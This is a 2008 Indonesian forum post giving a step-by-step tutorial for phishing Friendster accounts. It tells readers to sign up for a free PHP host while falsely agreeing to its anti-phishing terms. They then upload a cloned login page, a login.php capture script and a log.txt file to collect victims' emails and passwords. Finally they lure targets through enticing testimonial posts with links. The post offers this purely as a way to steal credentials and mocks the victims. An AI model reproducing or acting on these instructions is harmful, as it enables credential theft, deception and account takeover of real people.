IndeksPortalFAQPencarianGroupPendaftaranAnggotaLogin

Share | 
 

 phising FS

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
cabuler
super moderator
super moderator


Jumlah posting : 28
Registration date : 22.01.08

PostSubyek: phising FS   Wed Jan 23, 2008 4:38 pm

kata orang ..phising itu menipu orang pada saat dia ngebuka situs yang dia buka yang dia lihat itu tampilan2 gambar2 letak nya semuanya pokonya.. mirip 100% dengan asli nya.. jadi phising itu menipu orang.. seolah2 dia udah masuk situs tsb/login padahal dia salah kamar :P ah jadi pengen ciYa`...

sebetulnya trik ini da banyak beredar juga dan salah satu yang masih bsa di pake sampe sekarang,,, ga tau besok2 deh...
1.kamu harus punya websites/situs yang support PHP .. di sini aku pake 110mb.com cari2 aja webhost yang support PHP kalo bisa yang gratisan..coba ketik free webhost gitu di google.
atau coba ke www.110mb.com terus pilih REGISTER nah yang perlu di perhatikan di sini pada saat kamu register itu nanti kamu di suruh ngisi Terms of Service - Signature disini kamu isi aja I will never engage in phishing or abusive actions on 110mb
terus jangan sampe salah kamu waktu ngisi * Anti-Spam Validation: di sini kamu harus ngisi KODE2 yang udah ada di situ.. jadi ya harus JELI..nah kalo udah berhasil.. coba kamu check email kamu, kamu nanti dapet email yang intinya di suruh aktivasi pendaptaran kamu dan kamu dapet user name password waktu kamu register tadi.... terus kamu coba login di 110,mb,com kalo kamu bisa login .. hehe SELAMAT.. kamu da punya situs pribadi yang support php gratisan dan bisa buat PHISING FS.

atau coba pilih salah satu dari http://www.free-webhosts.com/webhosting-01.php
terus kamu register aja di situ. misal kan nama situs kamu nanti nya --http://ngebajaksawah.com-- getu atau apa lah sesuka suka kamu.

biasa nya nanti kalo udah jadi.. tiap webhost beda2 tampilan nya.. tapi coba kamu cari yang FILE MANAGER nah di sini nanti kita akan UPLOAD2 perintah2 PHP,HTML ,sama LOG buat Phising friendster. yang nanti2 nya kurang lebih kalo di buka setelah kamu UPload 3 file itu tadi...yang akan kluar tampilan nya itu mirip banget kaya login nya FRIENDSTER contoh
http://www.geocities.com/fahmiriz4l/friendster.html <-- mirip kan? kalo yang ga teliti di kira nya FS beneran padahal bokongan eh boongan..tapi di geocities biasanya suka kluar tampilan2 iklan2 dari google atau dari yahoonya sendiri mungkin.. dan untuk PHISING FS ini geocities ga bisa... krn ga suport PHP.kalo yang support PHP contoh sprt ini http://fahmiriz4l.110mb.com/friendster.html

2.setelah kamu udah punya website pribadi kamu sendiri yang pastinya harus support PHP... sekarang kamu kewarung beli rokok sama kopi .. ngamuk heheh maap .. mkst aku kamu buka NOTEPAD kamu.
coba buka 3 buah NOTEPAD kosong. Tau kan NOTEPAD ? kalo di windows adanya di start menu - program-accecories-notepad kalo ga salah..:P alah pokonya notepad lah...

3.nah sekarang.. kamu copy ke notepad pertama perintah dibawah ini dan kamu save kamu kasih judul FRIENDSTER.html <-- pokonya harus mirip kek gini loh ya.. ni perintah nya:
http://www.geocities.com/fahmiriz4l/HTML.txt <-- kamu buka ini, terus kamu COPY terus PASTE di NOTEPAD kamu.

setelah ke COPY di NOTEPAD kamu, sekarang coba kamu pencet CTRL + F terus kamu ketik http://fahmiriz4l.110mb.com/login.php <--- nah ini kamu ganti dengan alamat situs pribadi kamu yang udah support PHP itu tadi ditambah perintah slash(garismiring) login titik php .
misal kan http://nama.situskamu.com/login.php

nah sekarang kamu SAVE notepad yang udah diganti dengan nama situs pribadi kamu itu tadi dengan nama FRIENDSTER.HTML ( notepad ini yang nanti2 nya akan di upload di file manager situs kamu dan juga senjata buat menyerang si korban, krn nanti2nya NOTEPAD itu tadi setelah di upload akan berubah menjadi http://nama.situs.kamu.com/friendster.html )

4. nah sekarang kamu buka lagi NOTEPAD kosong.
terus kamu sekarang buka ini http://www.geocities.com/fahmiriz4l/perintahlogin.txt
terus sekarang kamu copy paste bahasa bhs aneh itu ke NOTEPAD kamu, lalu kamu SAVE dengan nama
LOGIN.PHP ( notepad ini juga yang nanti2 nya akan menjadi senjata kamu buat ngedapetin email dan pasword si korban!! )

5. sekarang kamu buka lagi NOTEPAD terus langsung aja kamu SAVE AS dengan nama LOG.txt

nah sekarang kamu udah punya 3 buah NOTEPAD

Friendster,html
login.php
log.txt

sekarang kamu LOGIN ke situs kamu, pada saat kamu masuk kamu cari2 aja tempat utk mengedit/mengpload data.. biasa nya sih tulisan nya FILE MANAGER, karena tiap2 webhost gratisan beda2 letak2 setingan2 nya.
kalo udah ketemu.
sekarang kamu UPLOAD ke 3 FILE NOTEPAD tsb.. terserah mau bersamaan atau satu2 tergantung koneksi inet kamu. tapi data nya kecil ko.. jadi kalo pun bersamaan kek nya enTeng deh.
setelah ke UPLOAD semua .. coba deh kamu klik sekarang hasil yang udah kamu UPLOAD itu tadi
misal kan friendster.html kamu klik itu trus coba kamu lihat nanti kluarnya sprt tampilang depan FS ga? oh iya jangan lupa kamu liat alamat URL situs kamu apa? soal nya URL itu yang nanti2nya senjata buat ngerjain si korban..

6. sekarang kamu udah punya senjata buat ngerjain si korban.. trus gimana cara makenya? hehehe coba pake cara yang agak2 halus misal kan gini kamu tulis TESTI di FS si korban .. dengan kata2 yang gombal bin menarik dan pokonya yang mengundang napsu untuk mengklik deh.. :P ah jadi pengen ehem ehem..

gini misal kan
Halo vina l!! Loe lebih suka yang mana masuk angin atau kang harY?? Klik gambar yang loe suka!!

klik di sini

macuk angin....

ganteng kan?
kang hary

ah gimana kek kalimat nya pokonya yang menarik getuh...
eit.. tungu dulu... ternyata ada caranya tuh buat kaya gituh ....
buka ini sekarang : http://www.geocities.com/fahmiriz4l/testi.txt

intinya pada saat si korban tertarik untuk ngeklik salah satu gambar tsb.. nanti si korban akan melihat tampilan SITUS PRIBADI kamu yang udah kamu bikin sedemikian rupa mirip banget sama tampilan LOGIN nya FS..

kalo si korban masukin email dan password nya.. selamat .. :cheers:
terus dimana kita lihat daftar email password si KORBAN?.. gampang... caranya sekarang.. kamu buka situs pribadi kamu itu tadi yang judl nya LOG.txt nah... kamu liat aja di situ nanti2nya kan akan terlihat seperti ini
contoh nya http://fahmiriz4l.110mb.com/log.txt

_________________
Orang bisa maju karena ada masalah ....didalam jiwa yang cabuL terdapat raga yang caBuL..ora nYambung :P
Kembali Ke Atas Go down
Lihat profil user
 
phising FS
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
boementz-forum :: komputer :: Programming-
Navigasi: